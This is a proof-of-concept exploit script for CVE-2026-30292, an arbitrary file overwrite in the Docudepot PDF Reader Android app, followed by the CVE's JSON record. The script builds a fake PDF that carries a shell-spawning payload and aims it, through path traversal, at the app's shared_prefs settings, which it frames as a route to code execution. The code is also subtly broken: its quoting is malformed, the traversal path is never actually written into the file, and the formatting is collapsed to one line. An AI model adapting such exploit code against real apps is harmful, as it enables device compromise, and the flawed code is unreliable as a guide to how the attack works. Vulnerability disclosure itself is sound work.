CVE-2026-30292

import os # Proof of Concept (PoC) for CVE-2026-30292 # This script demonstrates the logic of exploiting the arbitrary file overwrite vulnerability. # Scenario: Attacker creates a malicious file intended to overwrite a critical config file. # In a real exploitation, the attacker would trick the victim into importing this file # or place it in a location where Docudepot PDF Reader automatically processes it. def craft_exploit_file(target_file_path, payload_content): """ Simulates the creation of a file that, when imported by the vulnerable app, triggers the overwrite of a sensitive file. """ malicious_filename = "exploit_payload.pdf" # In this specific vulnerability, the import process likely uses the filename # or internal metadata to determine the write destination without proper sanitization. # We simulate the payload structure. print(f"[*] Crafting exploit file: {malicious_filename}") print(f"[*] Target internal path to overwrite: {target_file_path}") # Writing the simulated payload to a local file (representing the attacker's action) with open(malicious_filename, "wb") as f: # Header or specific file signature required by the PDF Reader f.write(b"%PDF-1.4\n") # Embedding the path traversal logic if the parser allows it, or simply # representing the data that will be written. # Assuming the app copies the file content directly to the vulnerable path. f.write(payload_content.encode('utf-8')) print(f"[+] Exploit file created successfully.") print(f"[!] Next Step: Import '{malicious_filename}' into Docudepot PDF Reader v1.0.34.") print(f"[!] Result: The application will overwrite '{target_file_path}' with the payload content.") # Example usage # Overwriting a shared preferences file or a native library could lead to RCE. target_path = "../../data/data/pdf.pdfreader.pdfeditor/shared_prefs/settings.xml" malicious_data = "<preferences><evil_code>exec('runtime.exec("/system/bin/sh")')</evil_code></preferences>" craft_exploit_file(target_path, malicious_data)

{"cve": {"id": "CVE-2026-30292", "sourceIdentifier": "[email protected]", "published": "2026-04-01T15:22:59.057", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Docudepot PDF Reader: PDF Viewer APP v1.0.34 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://docudepot.bitbucket.io/", "source": "[email protected]"}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/20", "source": "[email protected]"}, {"url": "https://play.google.com/store/apps/details?id=pdf.pdfreader.pdfeditor.pdfmaker.pdfscanner", "source": "[email protected]"}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]"}]}}